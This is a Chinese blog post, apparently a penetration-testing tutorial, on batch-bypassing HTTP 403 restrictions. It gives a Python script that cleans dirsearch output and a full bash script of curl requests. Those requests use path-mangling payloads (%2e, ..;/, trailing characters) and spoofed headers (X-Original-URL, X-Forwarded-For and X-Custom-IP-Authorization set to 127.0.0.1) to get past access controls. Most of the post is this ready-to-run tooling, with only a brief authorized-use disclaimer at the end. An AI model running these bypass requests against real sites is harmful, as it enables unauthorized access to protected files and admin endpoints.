解放双手,批量绕过403

将dirsearch扫描出来的结果复制到url.txt,如下所示

url.txt

[21:18:16] 502 -    0B  - /var/log/exception.log
[21:18:21] 502 -    0B  - /WEB-INF/jetty-env.xml
[21:18:22] 502 -    0B  - /WEB-INF/weblogic.xml
[21:18:27] 502 -    0B  - /wp-json/wp/v2/users/
[21:18:27] 502 -    0B  - /wp-json/
[21:18:28] 502 -    0B  - /wuwu11.php
[21:18:29] 502 -    0B  - /wwwstats.htm
[21:18:29] 502 -    0B  - /xprober.php
[21:18:30] 502 -    0B  - /zehir.php

接下来利用python脚本对url.txt进行清洗

python q.py url.txt

q.py代码如下所示:

​import sys

# 读取文件并清洗路径
def clean_paths(file_path):
    cleaned_paths = []
    with open(file_path, 'r') as file:
        for line in file:
            # 提取路径部分
            path = line.split(' - ')[2].strip()
            # 二次清洗,去除路径两端的斜杠
            cleaned_path = path.strip('/')
            cleaned_paths.append(cleaned_path)
    return cleaned_paths

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python script.py <input_file>")
        sys.exit(1)

    input_file_path = sys.argv[1]
    output_file_path = 'path.txt'

    # 执行清洗路径函数
    cleaned_paths = clean_paths(input_file_path)

    # 将结果写入到path.txt文件中
    with open(output_file_path, 'w') as output_file:
        for path in cleaned_paths:
            output_file.write(path + '\n')

    print("清洗后的路径已写入到 path.txt 文件中。")

上面的脚本将清洗后的结果输出到path.txt

接着使用脚本bypass403.sh

bypass403.sh脚本内容如下:

#! /bin/bash
figlet Bypass-403
echo "By Iam_J0ker"
echo " "

# 检查是否提供了URL和路径文件
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "使用方法: $0 <URL> <路径文件>"
    exit 1
fi

# 提取URL
url=$1
shift

# 检查路径文件是否存在且可读
if [ ! -f "$1" ]; then
    echo "未找到路径文件或不可读"
    exit 1
fi

# 显示URL
echo "URL: $url"

# 逐行读取路径文件中的路径
while IFS= read -r path; do
    # 显示路径
    echo "路径: $path"
    
    # 执行绕过技术
    echo " "
    echo "正在对 $url$path 执行绕过技术"
    echo " "

    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path"
    echo "  --> $url/$path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/%2e/$path"
    echo "  --> $url/%2e/$path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/."
    echo "  --> $url/$path/."
    
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url//$path//"
    echo "  --> $url//$path//"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/./$path/./"
    echo "  --> $url/./$path/./"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $path" "$url/$path"
    echo "  --> $url/$path -H X-Original-URL: $path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Custom-IP-Authorization: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-For: http://127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-For: 127.0.0.1:80"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $path" "$url"
    echo "  --> $url -H X-rewrite-url: $path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path%20"
    echo "  --> $url/$path%20"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path%09"
    echo "  --> $url/$path%09"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path?"
    echo "  --> $url/$path?"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.html"
    echo "  --> $url/$path.html"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/?anything"
    echo "  --> $url/$path/?anything"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path#"
    echo "  --> $url/$path#"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST "$url/$path"
    echo "  --> $url/$path -H Content-Length:0 -X POST"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/*"
    echo "  --> $url/$path/*"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.php"
    echo "  --> $url/$path.php"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.json"
    echo "  --> $url/$path.json"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$url/$path"
    echo "  --> $url/$path -X TRACE"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Host: 127.0.0.1"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path..;/"
    echo "  --> $url/$path..;/"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path;/"
    echo "  --> $url/$path;/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$url/$path"
    echo "  --> $url/$path -X TRACE"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-Host: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-Host: 127.0.0.1"
    echo "Way back machine:"
    curl -s  https://archive.org/wayback/available?url=$url/$path | jq -r '.archived_snapshots.closest | {available, url}'
    echo " "
done < "$1"

将上面这些文件均放在同文件夹下

用命令启动:

./bypass403.sh url pass.txt

从而达到批量绕过403的目的。

参考链接:

https://github.com/iamj0ker/bypass-403?tab=readme-ov-file

​以上目的只为了方便日常渗透测试,侵权请联系删除!!!未授权切勿进行渗透!!!

  • 18
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值